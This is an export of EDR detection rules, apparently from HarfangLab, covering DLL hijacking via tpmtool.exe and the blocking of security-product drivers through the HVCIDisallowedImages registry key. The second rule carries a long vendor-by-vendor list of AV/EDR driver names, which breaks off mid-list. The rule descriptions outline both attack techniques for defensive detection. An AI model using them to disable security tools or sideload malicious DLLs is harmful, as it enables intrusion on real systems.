"content": "title: DLL Hijacking via tpmtool.exe\nid: 48f0f344-553f-4625-bdde-3c3f6e4f8e44\ndescription: |\n Detects potential Windows DLL Hijacking via tpmtool.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'tpmtool.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\tbs.dll'\n - '\\tpmcoreprovisioning.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "48f0f344-553f-4625-bdde-3c3f6e4f8e44",
"rule_name": "DLL Hijacking via tpmtool.exe",
"rule_description": "Detects potential Windows DLL Hijacking via tpmtool.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "48fe9f11-44de-4b4b-807c-00bb14c3058b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071663Z",
"creation_date": "2026-03-23T11:45:34.071665Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071669Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://raw.githubusercontent.com/trailofbits/publications/offensivecon-2023/presentations/Your%20Mitigations%20are%20My%20Opportunities/Your%20Mitigations%20are%20My%20Opportunities.pdf",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_hvci_driver_disable.yml",
"content": "title: EDR/AV Driver added to HVCI Disallowed Images in Registry\nid: 48fe9f11-44de-4b4b-807c-00bb14c3058b\ndescription: |\n Detects common AV or EDR driver names being written into the HVCIDisallowedImages registry key. This feature will only take effect on the next machine reboot.\n HVCI (Hypervisor Enforced Code Integrity) is a Windows mechanism that contains an undocumented feature that allows to register an array of driver names to be blocked.\n Attackers can use this feature to disable security products by blocking their respective drivers.\n It is recommended to check whether the process modifying the registry keys has legitimate reasons to do it.\nreferences:\n - https://raw.githubusercontent.com/trailofbits/publications/offensivecon-2023/presentations/Your%20Mitigations%20are%20My%20Opportunities/Your%20Mitigations%20are%20My%20Opportunities.pdf\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2023/06/13\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\System\\CurrentControlSet\\Control\\CI\\HVCIDisallowedImages'\n Details|contains:\n # 360 Software (Beijing)\n - '360qpesv.sys'\n # 5nine Software Inc.\n - '5nine.cbt.sys'\n # Ahkun Co.\n - 'AhkSvPro.sys'\n - 'AhkUsbFW.sys'\n - 'AhkAMFlt.sys'\n # Ahnlab\n - 'V3MifiNt.sys'\n - 'V3Ift2k.sys'\n - 'V3IftmNt.sys'\n - 'ArfMonNt.sys'\n - 'AhnRghLh.sys'\n - 'AszFltNt.sys'\n - 'OMFltLh.sys'\n - 'V3Flu2k.sys'\n - 'AdcVcsNT.sys'\n # AhnLab Inc.\n - 'TfFregNt.sys'\n # AhnLab, Inc.\n - 'SMDrvNt.sys'\n - 'ATamptNt.sys'\n - 'V3Flt2k.sys'\n # Alwil\n - 'aswmonflt.sys'\n # Anvisoft\n - 'avfsmn.sys'\n # Arcdo\n - 'ANVfsm.sys'\n - 'CDrRSFlt.sys'\n # Ashampoo GmbH & Co. KG\n - 'AshAvScan.sys'\n # Australian Projects\n - 'ZxFsFilt.sys'\n # Authentium\n - 'avmf.sys'\n # AVG Grisoft\n - 'avgmfx86.sys'\n - 'avgmfx64.sys'\n - 'avgmfi64.sys'\n - 'avgmfrs.sys'\n # Avira GmbH\n - 'avgntflt.sys'\n # AVNOS\n - 'kavnsi.sys'\n # AvSoft Technologies\n - 'strapvista.sys'\n - 'strapvista64.sys'\n # AxBx\n - 'vk_fsf.sys'\n # Baidu (beijing)\n - 'BDFileDefend.sys'\n # Baidu (Hong Kong) Limited\n - 'Bfilter.sys'\n # Baidu online network technology (beijing)Co.\n - 'BDsdKit.sys'\n - 'bd0003.sys'\n # Beijing Kingsoft\n - 'ksfsflt.sys'\n # Beijing Majorsec\n - 'majoradvapi.sys'\n # Beijing Rising Information Technology Corporation Limited\n - 'HookSys.sys'\n # Beijing Venus\n - 'TxFileFilter.sys'\n - 'VTSysFlt.sys'\n # Binary Defense Systems\n - 'Osiris.sys'\n # Bit9 Inc\n - 'b9kernel.sys'\n # Bitdefender\n - 'bdsvm.sys'\n # BitDefender SRL\n - 'hbflt.sys'\n - 'vlflt.sys'\n - 'gzflt.sys'\n - 'bddevflt.sys'\n - 'ignis.sys'\n - 'AVCKF.SYS'\n - 'gemma.sys'\n - 'Atc.sys'\n - 'AVC3.SYS'\n - 'TRUFOS.SYS'\n # Bkav Corporation\n - 'BkavAutoFlt.sys'\n - 'BkavSdFlt.sys'\n # BLACKFORT SECURITY\n - 'bSyirmf.sys'\n - 'bSysp.sys'\n - 'bSydf.sys'\n - 'bSywl.sys'\n - 'bSyrtm.sys'\n - 'bSyaed.sys'\n - 'bSyar.sys'\n # BullGuard\n - 'BdFileSpy.sys'\n # C-NetMedia Inc\n - 'antispyfilter.sys'\n # CheckMAL Inc\n - 'AppCheckD.sys'\n # Cheetah Mobile Inc.\n - 'wdocsafe.sys'\n - 'lbprotect.sys'\n # Cisco Systems\n - 'csaav.sys'\n - 'CiscoSAM.sys'\n - 'immunetselfprotect.sys'\n - 'immunetprotect.sys'\n - 'CiscoAMPCEFWDriver.sys'\n - 'CiscoAMPHeurDriver.sys'\n # CJSC Returnil Software\n - 'rvsmon.sys'\n # CodeProof Technologies Inc\n - 'CpAvFilter.sys'\n - 'CpAvKernel.sys'\n # Comodo Group Inc.\n - 'cmdccav.sys'\n - 'cmdguard.sys'\n # Computer Assoc\n - 'caavFltr.sys'\n - 'ino_fltr.sys'\n # ConeSecurity Inc\n - 'CSFlt.sys'\n # Confluera Inc\n - 'tbmninifilter.sys'\n # Coranti Inc.\n - 'crnsysm.sys'\n - 'crncache32.sys'\n - 'crncache64.sys'\n # CoreTrace Corporation\n - 'bouncer.sys'\n # CrowdStrike Ltd.\n - 'csagent.sys'\n # Dakota State University\n - 'EdnemFsFilter.sys'\n # Deep Instinct\n - 'DeepInsFS.sys'\n # Digitalonnet\n - 'ADSpiderDoc.sys'\n # Doctor Web\n - 'drwebfwft.sys'\n - 'DwShield.sys'\n - 'DwShield64.sys'\n - 'dwprot.sys'\n # Doctor Web Ltd.\n - 'Spiderg3.sys'\n # DriveSentry Inc\n - 'drivesentryfilterdriver2lite.sys'\n # EasyAntiCheat Solutions\n - 'easyanticheat.sys'\n # eEye Digital Security\n - 'eeyehv.sys'\n - 'eeyehv64.sys'\n # Egnyte Inc\n - 'egnfsflt.sys'\n # EMC\n - 'ECATDriver.sys'\n # Emsi Software GmbH\n - 'a2ertpx86.sys'\n - 'a2ertpx64.sys'\n - 'a2gffx86.sys'\n - 'a2gffx64.sys'\n - 'a2gffi64.sys'\n - 'a2acc.sys'\n - 'a2acc64.sys'\n # EnigmaSoft\n - 'EnigmaFileMonDriver.sys'\n # ESET, spol. s r.o.\n - 'eamonm.sys'\n # ESTsecurity Corp\n - 'RSRtw.sys'\n - 'RSPCRtw.sys'\n # ESTsoft\n - 'AYFilter.sys'\n - 'Rtw.sys'\n # ESTsoft corp.\n - 'EstRkmon.sys'\n - 'EstRkr.sys'\n # ETRI\n - 'vrSDetri.sys'\n - 'vrSDetrix.sys'\n # Everyzone\n - 'TvMFltr.sys'\n # EveryZone Inc.\n - 'IProtect.sys'\n # EveryZone INC.\n - 'TvFiltr.sys'\n - 'TvDriver.sys'\n - 'TvSPFltr.sys'\n - 'TvPtFile.sys'\n # f-protect\n - 'fpav_rtp.sys'\n # f-secure\n - 'fsgk.sys'\n # Filseclab\n - 'fildds.sys'\n # Fortinet Inc.\n - 'FortiAptFilter.sys'\n - 'fortimon2.sys'\n - 'fortirmon.sys'\n - 'fortishield.sys'\n # Fujitsu Social Science\n - 'wscm.sys'\n # FXSEC LTD\n - 'pfkrnl.sys'\n # G Data\n - 'HookCentre.sys'\n - 'PktIcpt.sys'\n - 'MiniIcpt.sys'\n # GAS Tecnologia\n - 'GbpKm.sys'\n # Greatsoft Corp.Ltd\n - 'vcdriv.sys'\n - 'vcreg.sys'\n - 'vchle.sys'\n # GRGBanking Equipment\n - 'SECOne_USB.sys'\n - 'SECOne_Proc10.sys'\n - 'SECOne_REG10.sys'\n - 'SECOne_FileMon10.sys'\n # GridinSoft LLC\n - 'gtkdrv.sys'\n # HAURI\n - 'VrARnFlt.sys'\n - 'VrBBDFlt.sys'\n - 'vrSDfmx.sys'\n - 'vrSDam.sys'\n - 'VrAptDef.sys'\n - 'VrSdCore.sys'\n - 'VrFsFtM.sys'\n - 'VrFsFtMX.sys(AMD64)'\n - 'vradfil2.sys'\n # HAURI Inc.\n - 'VRAPTFLT.sys'\n # Hidden Reflex\n - 'epicFilter.sys'\n # Hitachi Solutions\n - 'hsmltwhl.sys'\n - 'hssfwhl.sys'\n # HSM IT-Services Gmbh\n - 'oavfm.sys'\n # Huorong Security\n - 'sysdiag.sys'\n # IBM\n - 'issregistry.sys'\n # IKARUS Security\n - 'ntguard.sys'\n # Imperva Inc.\n - 'mfdriver.sys'\n # INCA Internet Co.\n - 'npxgd.sys'\n - 'npxgd64.sys'\n - 'tkpl2k.sys'\n - 'tkpl2k64.sys'\n - 'GKFF.sys'\n - 'GKFF64.sys'\n - 'tkdac2k.sys'\n - 'tkdacxp.sys'\n - 'tkdacxp64.sys'\n - 'tksp2k.sys'\n - 'tkspxp.sys'\n - 'tkspxp64.sys'\n # INCA Internet Co., Ltd\n - 'tkfsft.sys'\n - 'tkfsft64.sys'\n - 'tkfsavxp.sys'\n - 'tkfsavxp64.sys'\n # Individual developer (Soft3304)\n - 'AntiLeakFilter.sys'\n # IObit Information Tech\n - 'IMFFilter.sys'\n # ISS\n - 'issfltr.sys'\n # K7 Computing Private Ltd.\n - 'K7Sentry.sys'\n # Kaspersky\n - 'klbg.sys'\n - 'kldback.sys'\n - 'kldlinf.sys'\n - 'kldtool.sys'\n - 'klif.sys'\n # Kaspersky Lab\n - 'klam.sys'\n # KINGSOFT\n - 'dgsafe.sys'\n # knowwheresoft Ltd\n - 'securoFSD_x64.sys'\n # Komoku Inc.\n - 'kmkuflt.sys'\n # Lavasoft AB\n - 'lbd.sys'\n # Leith Bade\n - 'cwdriver.sys'\n # Lenovo\n - 'lnvscenter.sys'\n # Lightspeed Systems Inc.\n - 'SAFsFilter.sys'\n # Malwarebytes Corp.\n - 'FlightRecorder.sys'\n - 'mbam.sys'\n # MastedCode Ltd\n - 'fsfilter.sys'\n # Max Secure Software\n - 'MaxProc64.sys'\n - 'MaxProtector.sys'\n - 'maxcryptmon.sys'\n - 'SDActMon.sys'\n # McAfee Inc.\n - 'epdrv.sys'\n - 'mfencoas.sys'\n - 'mfehidk.sys'\n - 'swin.sys'\n # Meidensha Corp\n - 'WhiteShield.sys'\n # Microsoft\n - 'WdFilter.sys'\n - 'mpFilter.sys'\n - 'SysmonDrv.sys'\n # MicroWorld Software Services Pvt. Ltd.\n - 'mwfsmfltr.sys'\n # NeoAutus\n - 'NeoKerbyFilter'\n # Netlor SAS\n - 'KUBWKSP.sys'\n # NetSecurity Corp\n - 'trfsfilter.sys'\n # NHN\n - 'nsminflt.sys'\n - 'nsminflt64.sys'\n # Norman\n - 'nvcmflt.sys'\n # Norman ASA\n - 'nprosec.sys'\n - 'nregsec.sys'\n # Novatix Corporation\n - 'NxFsMon.sys'\n # NPcore Ltd\n - 'FileScan.sys'\n # Odyssey Cyber Security\n - 'ODFsFimFilter.sys'\n - 'ODFsTokenFilter.sys'\n - 'ODFsFilter.sys'\n # OKUMA Corp\n - 'ospfile_mini.sys'\n # OnMoon Company LLC\n - 'acdrv.sys'\n # Palo Alto Networks\n - 'CyvrFsfd.sys'\n # Panda Security\n - 'PSINPROC.SYS'\n - 'PSINFILE.SYS'\n - 'amfsm.sys'\n - 'amm8660.sys'\n - 'amm6460.sys'\n # Panda Software\n - 'NanoAVMF.sys'\n - 'shldflt.sys'\n # Panzor Cybersecurity\n - 'pavdrv.sys'\n # Paretologic\n - 'PLGFltr.sys'\n # PC Tools Pty. Ltd.\n - 'PCTCore64.sys'\n - 'PCTCore.sys'\n - 'ikfilesec.sys'\n # Perfect World Co. Ltd\n - 'PerfectWorldAntiCheatSys.sys'\n # PerfectWorld Ltd\n - 'PWProtect.sys'\n # PerSystems SA\n - 'pervac.sys'\n # Pooyan System\n - 'RanPodFS.sys'\n # PWI, Inc.\n - 'pwipf6.sys'\n # Qihoo 360\n - 'dsark.sys'\n - '360avflt.sys'\n # Quick Heal Technologies Pvt. Ltd.\n - 'snsrflt.sys'\n - 'bdsflt.sys'\n - 'arwflt.sys'\n # Quick Heal TechnologiesPvt. Ltd.\n - 'ggc.sys'\n - 'catflt.sys'\n # ReaQta Ltd.\n - 'reaqtor.sys'\n # refractionPOINT\n - 'hcp_kernel_acq.sys'\n # REVE Antivirus\n - 'ReveFltMgr.sys'\n - 'ReveProcProtection.sys'\n # S.N.Safe&Software\n - 'snscore.sys'\n # Sangfor Technologies\n - 'sfavflt.sys'\n # Savant Protection, Inc.\n - 'savant.sys'\n # Scargo Inc\n - 'si32_file.sys'\n - 'si64_file.sys'\n # SECUI Corporation\n - 'sciptflt.sys'\n - 'scifsflt.sys'\n # SecuLution GmbH\n - 'ssvhook.sys'\n # SecureAge Technology\n - 'sascan.sys'\n # SecureBrain Corporation\n - 'mscan-rt.sys'\n # SecureLink Inc.\n - 'zwPxeSvr.sys'\n - 'zwASatom.sys'\n # Securitas Technologies,Inc.\n - 'NovaShield.sys'\n # SecurityCoverage, Inc.\n - 'SCFltr.sys'\n # Segira LLC\n - 'SegiraFlt.sys'\n # Segurmatica\n - 'SegMD.sys'\n - 'SegMP.sys'\n - 'SegF.sys'\n # Sequretek IT\n - 'KawachFsMinifilter.sys'\n # SGA\n - 'EPSMn.sys'\n # SGRI Co., LTD.\n - 'vcMFilter.sys'\n # SheedSoft Ltd\n - 'SheedAntivirusFilterDriver.sys'\n # Shenzhen Tencent Computer Systems Company Limited\n - 'TSysCare.sys'\n - 'TFsFlt.sys'\n # Softwin\n - 'bdfsfltr.sys'\n - 'bdfm.sys'\n # Sophos\n - 'savonaccess.sys'\n - 'sld.sys'\n # SpellSecurity\n - 'spellmon.sys'\n # Sybonic Systems Inc\n - 'THFilter.sys'\n # symantec\n - 'eeCtrl.sys'\n - 'eraser.sys'\n - 'SRTSP.sys'\n - 'SRTSPIT.sys'\n - 'SRTSP64.SYS'\n # Symantec\n - 'VirtualAgent.sys'\n # Tall Emu\n - 'OADevice.sys'\n # Technology Nexus AB\n - 'SE46Filter.sys'\n # TEHTRI-Security\n - 'egambit.sys'\n # Tencent\n - 'TesMon.sys'\n - 'QQSysMonX64.sys'\n - 'QQSysMon.sys'\n # Teramind\n - 'tmfsdrv2.sys'\n # TRAPMINE A.S.\n - 'trpmnflt.sys'\n # Trend\n - 'tmpreflt.sys'\n # Trend Micro Inc.\n - 'TmKmSnsr.sys'\n - 'fileflt.sys'\n - 'TmEsFlt.sys'\n - 'TmEyes.sys'\n - 'tmevtmgr.sys'\n # Verdasys Inc\n - 'STKrnl64.sys'\n # VisionPower Co.,Ltd.\n - 'PZDrvXP.sys'\n # VMware, Inc.\n - 'vsepflt.sys'\n - 'VFileFilter.sys(renamed)'\n # WardWiz\n - 'WrdWizSecure64.sys'\n - 'wrdwizscanner.sys'\n # Webroot Inc.\n - 'WRAEKernel.sys'\n - 'WRKrn.sys'\n - 'WRCore.sys'\n # Webroot Software, Inc.\n - 'ssfmonm.sys'\n # White Cloud Security\n - 'WCSDriver.sys'\n # WidgetNuri Corp\n - 'SoftFilterxxx.sys'\n - 'RansomDefensexxx.sys'\n # WINS CO. LTD\n - 'agentrtm64.sys'\n - 'rswmon.sys'\n # Yoggie\n - 'UFDFilter.sys'\n # ZhengYong InfoTech LTD.\n - 'Zyfm.sys'\n #\n # FSFilter Anti-Virus - END\n #\n #\n # FSFilter Activity Monitor - BEGIN\n #\n # (c)SMS\n - 'isafermon'\n # 1mill\n - 'FSMon.sys'\n # 360 Software (Beijing)\n - 'AtdrAgent.sys'\n - 'AtdrAgent64.sys'\n - 'Qutmdrv.sys'\n # Acronis\n - 'NgScan.sys'\n # Actifio Inc\n - 'aaf.sys'\n # Adaptiva\n - 'AdaptivaClientCache32.sys'\n - 'AdaptivaclientCache64.sys'\n # Adtrustmedia\n - 'browserMon.sys'\n # AhnLab, Inc.\n - 'VPDrvNt.sys'\n # AI Consulting\n - 'aictracedrv_am.sys'\n # Airlock Digital Pty Ltd\n - 'alcapture.sys'\n # AIRWare Technology Ltd\n - 'airship-filter.sys'\n # Alfa\n - 'AlfaFF.sys'\n # Aliaksander Lebiadzevich\n - 'SDDrvLdr.sys'\n # AlphaAntiLeak\n - 'AALProtect.sys'\n # ALPS SYSTEM INTERGRATION CO.\n - 'ISIRMFmon.sys'\n # Altaro Ltd.\n - 'altcbt.sys'\n # ALWIL Software\n - 'aswFsBlk.sys'\n # Amazon Web Services Inc\n - 'AmznMon.sys'\n # Analytik Jena AG\n - 'ajfsprot.sys'\n # ApexSQL LLC\n - 'ApexSqlFilterDriver.sys'\n # AppGuard LLC\n - 'AGSysLock.sys'\n - 'AGSecLock.sys'\n # AppiXoft\n - 'axfsysmon.sys'\n - 'scensemon.sys'\n # AppSense Ltd\n - 'DataNow_Driver.sys'\n - 'UcaFltDriver.sys'\n # AppStream, Inc.\n - 'rflog.sys'\n # ApSoft\n - 'CwMem2k64.sys'\n # Aqua Security\n - 'ContainerMonitor.sys'\n # Arcserve\n - 'xoiv8x64.sys'\n # Arkoon Network Security\n - 'heimdall.sys'\n # Ashampoo Development\n - 'IFS64.sys'\n # AsiaInfo Technologies\n - 'kFileFlt.sys'\n # Aternity Ltd\n - 'AternityRegistryHook.sys'\n # Atlansys Software\n - 'atflt.sys'\n - 'amfd.sys'\n # Avanite Limited\n - 'AvaPsFD.sys'\n # Avast Software\n - 'aswSP.sys'\n # AVG Technologies CZ\n - 'avgtpx86.sys'\n - 'avgtpx64.sys'\n # Avira GmbH\n - 'avipbb.sys'\n # Axact Pvt Ltd\n - 'axfltdrv.sys'\n # Axur Information Sec.\n - 'amsfilter.sys'\n # Baidu (beijing)\n - 'BdRdFolder.sys'\n # Baidu (Hong Kong) Limited\n - 'Bfmon.sys'\n # Baidu Online Network\n - 'bdsysmon.sys'\n # Barkly Protects Inc.\n - 'BOsCmFlt.sys'\n - 'BOsFsFltr.sys'\n # BattlEye Innovations\n - 'BEDaisy.sys'\n # Beijing CA-JinChen Software Co.\n - 'kfac.sys'\n # Beijing QiAnXin Tech.\n - 'QmInspec.sys'\n # Beijing Qihoo Technology Co.\n - '360fsflt.sys'\n # Beijing Shu Yan Science\n - 'GagSecurity.sys'\n # Beijing Zhong Hang Jiaxin Computer Technology Co.,Ltd.\n - 'filefilter.sys'\n # Best Security\n - 'rpwatcher.sys'\n # BeyondTrust Inc.\n - 'BlackbirdFSA.sys'\n # BicDroid Inc.\n - 'QDocumentREF.sys'\n # Bit9 Inc.\n - 'CarbonBlackK.sys'\n # BitArmor Systems, Inc\n - 'bapfecpt.sys'\n - 'bamfltr.sys'\n # Bitdefender SRL\n - 'edrsensor.sys'\n - 'bdprivmon.sys'\n # bitFence Inc.\n - 'bfaccess.sys'\n # BiZone LLC\n - 'bzsenyaradrv.sys'\n - 'bzsenspdrv.sys'\n - 'bzsenth.sys'\n # Blue Ridge Networks\n - 'BrnFileLock.sys'\n - 'BrnSecLock.sys'\n # Bluzen Inc\n - 'ipcomfltr.sys'\n # Broadcom\n - 'symevnt.sys'\n - 'symevnt32.sys'\n # Bromium Inc\n - 'brfilter.sys'\n - 'BrCow_x_x_x_x.sys'\n - 'BemK.sys'\n # ByStorm\n - 'BssAudit.sys'\n # C-DAC Hyderabad\n - 'pecfilter.sys'\n # CA\n - 'xomfcbt8x64.sys'\n - 'KmxAgent.sys'\n - 'KmxFile.sys'\n - 'KmxSbx.sys'\n # Carbonite Inc\n - 'MozyNextFilter.sys'\n - 'MozyCorpFilter.sys'\n - 'MozyEntFilter.sys'\n - 'MozyOEMFilter.sys'\n - 'MozyEnterpriseFilter.sys'\n - 'MozyProFilter.sys'\n - 'MozyHomeFilter.sys'\n - 'BDSFilter.sys'\n - 'CSBFilter.sys'\n # cEncrypt\n - 'dsflt.sys'\n # Centennial Software Ltd\n - 'msiodrv4.sys'\n # Centre for Development of Advanced Computing\n - 'USBPDH.SYS'\n # Centrify Corp\n - 'CentrifyFSF.sys'\n # Certero\n - 'cmflt.sys'\n # Chaewool\n - 'cFSfdrv'\n # Check Point Software\n - 'epregflt.sys'\n - 'epklib.sys'\n # Checkpoint Software\n - 'cpepmon.sys'\n # ChemoMetec\n - 'ChemometecFilter.sys'\n # Cigent Technology Inc\n - 'Spotlight.sys'\n # Cigital, Inc.\n - 'fmdrive.sys'\n # Cisco Systems\n - 'csaam.sys'\n # Citrix Systems\n - 'srminifilterdrv.sys'\n # Clonix Co\n - 'rsfdrv.sys'\n # Clumio Inc\n - 'ClumioChangeBlockMf.sys'\n # Code42\n - 'Code42Filter.sys'\n # ColorTokens\n - 'FFDriver.sys'\n # Comae Tech\n - 'windd.sys'\n # CommVault Systems, Inc.\n - 'CVCBT.sys'\n # Comodo Security Solutions Inc.\n - 'CmdCwagt.sys'\n - 'cfrmd.sys'\n # ComTrade\n - 'ctamflt.sys'\n # Comtrue Technology\n - 'shdlpSf.sys'\n - 'ctrPAMon.sys'\n - 'shdlpMedia.sys'\n # Conduant Corporation\n - 'ConduantFSFltr.sys'\n # Condusiv Technologies\n - 'hiofs.sys'\n # CondusivTechnologies\n - 'vintmfs.sys'\n - 'intmfs.sys'\n - 'excfs.sys'\n # Confio\n - 'IridiumSwitch.sys'\n # CONNECT SHIFT LTD\n - 'DTPL.sys'\n # Crawler Group\n - 'tbrdrv.sys'\n # Credant Technologies\n - 'XendowFLT.sys'\n # CristaLink\n - 'mtsvcdf.sys'\n # CRU Data Security Group\n - 'CdsgFsFilter.sys'\n # CyberArk Software\n - 'vfpd.sys'\n - 'CybKernelTracker.sys'\n # CyberSight Inc\n - 'csmon.sys'\n # Cygna Labs\n - 'FileMonitor.sys'\n # Cylance Inc.\n - 'CyOptics.sys'\n - 'CyProtectDrv32.sys'\n - 'CyProtectDrv64.sys'\n # Cytrence Inc\n - 'cytmon.sys'\n # Datacloak Tech\n - 'dcfsgrd.sys'\n # DataGravity Inc.\n - 'dgfilter.sys'\n # Datto Inc\n - 'DattoFSF.sys'\n # Dell Secureworks\n - 'groundling32.sys'\n - 'groundling64.sys'\n # Dell Software Inc.\n - 'DgeDriver.sys'\n # DELL Technologies\n - 'DTDSel.sys'\n # Dell Technologies\n - 'NWEDriver.sys'\n # derivo GmbH\n - 'bbfilter.sys'\n # Digitalsense Co\n - 'dsfltfs.sys'\n # Diskeeper Corporation\n - 'nowonmf.sys'\n - 'dktlfsmf.sys'\n - 'DKDrv.sys'\n - 'DKRtWrt.sys'\n - 'HBFSFltr.sys'\n # Dmitry Stefankov\n - 'WinTeonMiniFilter.sys'\n - 'wiper.sys'\n - 'DevMonMiniFilter.sys'\n # Doctor Web\n - 'Drwebfwflt.sys'\n - 'EventMon.sys'\n # Douzone Bizon Co\n - 'rswctrl.sys'\n - 'mcstrg.sys'\n - 'fmkkc.sys'\n - 'nmlhssrv01.sys'\n # DreamCrafts\n - 'SaMFlt.sys'\n # Dtex Systems\n - 'dnaFSMonitor.sys'\n # EaseVault Technologies Inc.\n - 'EaseFlt.sys'\n # Egis Technology Inc.\n - 'eLock2FSCTLDriver.sys'\n # eIQnetworks Inc.\n - 'FIM.sys'\n # Elex Tech Inc\n - 'iSafeKrnl.sys'\n - 'iSafeKrnlMon.sys'\n # eMingSoftware Inc\n - 'NetPeeker.sys'\n # Encourage Technologies\n - 'asiofms.sys'\n # Enterprise Data Solutions, Inc.\n - 'edsigk.sys'\n # Entrust Inc.\n - 'eetd32.sys'\n - 'eetd64.sys'\n # ESET, spol. s r.o.\n - 'ehdrv.sys'\n # ESTsoft corp.\n - 'EstPrmon.sys'\n - 'Estprp.sys'\n - 'EstRegmon.sys'\n - 'EstRegp.sys'\n # F-Secure\n - 'fshs.sys'\n - 'fsatp.sys'\n # Faronics Corporation\n - 'AeFilter.sys'\n # FastTrack Software ApS\n - 'AbrPmon.sys'\n # FFC Limited\n - 'FFCFILT.SYS'\n # FileTek, Inc.\n - 'TrustedEdgeFfd.sys'\n # FireEye Inc\n - 'WFP_MRT.sys'\n # FireEye Inc.\n - 'FeKern.sys'\n # Fitsec Ltd\n - 'kconv.sys'\n - 'trace.sys'\n - 'SandDriver.sys'\n # Flexera Software Inc.\n - 'ISRegFlt.sys'\n - 'ISRegFlt64.sys'\n # ForcePoint LLC.\n - 'fpepflt.sys'\n # Fujian Shen Kong\n - 'wats_se.sys'\n # FUJITSU ENGINEERING\n - 'ibr2fsk.sys'\n # FUJITSU LIMITED\n - 'FJGSDis2.sys'\n - 'FJSeparettiFilterRedirect.sys'\n - 'Fsw31rj1.sys'\n - 'da_ctl.sys'\n # FUJITSU SOCIAL SCIENCE\n - 'secure_os.sys'\n # FUJITSU SOFTWARE\n - 'PsAcFileAccessFilter.sys'\n # Fusion-io\n - 'fiometer.sys'\n - 'dcSnapRestore.sys'\n # Futuresoft\n - 'PointGuardVistaR32.sys'\n - 'PointGuardVistaR64.sys'\n - 'PointGuardVistaF.sys'\n - 'PointGuardVista64F.sys'\n # G Data Software AG\n - 'gddcv.sys'\n # GameHi Co.\n - 'Codex.sys'\n # GemacmbH\n - 'GcfFilter.sys'\n # Glarysoft Ltd.\n - 'GUMHFilter.sys'\n # Google, Inc.\n - 'MRxGoogle.sys'\n # Gorizonty Rosta Ltd\n - 'GoFSMF.sys'\n # GrammaTech, Inc.\n - 'drvhookcsmf.sys'\n - 'drvhookcsmf_amd64.sys'\n # Group-IB LTD\n - 'gibepcore.sys'\n # HA Unix Pt\n - 'hafsnk.sys'\n # Hangzhou Yifangyun\n - 'fangcloud_autolock_driver.sys'\n # HAURI\n - 'secure_os_mf.sys'\n # Hauri Inc\n - 'VrVBRFsFilter.sys'\n - 'VrExpDrv.sys'\n # HAVELSAN A.\n - 'HVLMinifilter.sys'\n # HEAT Software\n - 'SK.sys'\n # Heilig Defense LLC\n - 'HDRansomOffDrv.sys'\n - 'HDCorrelateFDrv.sys'\n - 'HDFileMon.sys'\n # Hexis Cyber Solutions\n - 'HexisFSMonitor.sys'\n # HFN Inc.\n - 'RGNT.sys'\n # Hitachi Solutions\n - 'hsmltmon.sys'\n # Honeycomb Technologies\n - 'dskmn.sys'\n # HP\n - 'hpreg.sys'\n # i-Guard SAS\n - 'iGuard.sys'\n # I-O DATA DEVICE\n - 'sConnect.sys'\n # IBM\n - 'NmpFilter.sys'\n - 'FsMonitor.sys'\n # Idera\n - 'IderaFilterDriver.sys'\n # Idera Software\n - 'SQLsafeFilterDriver.sys'\n # IGLOO 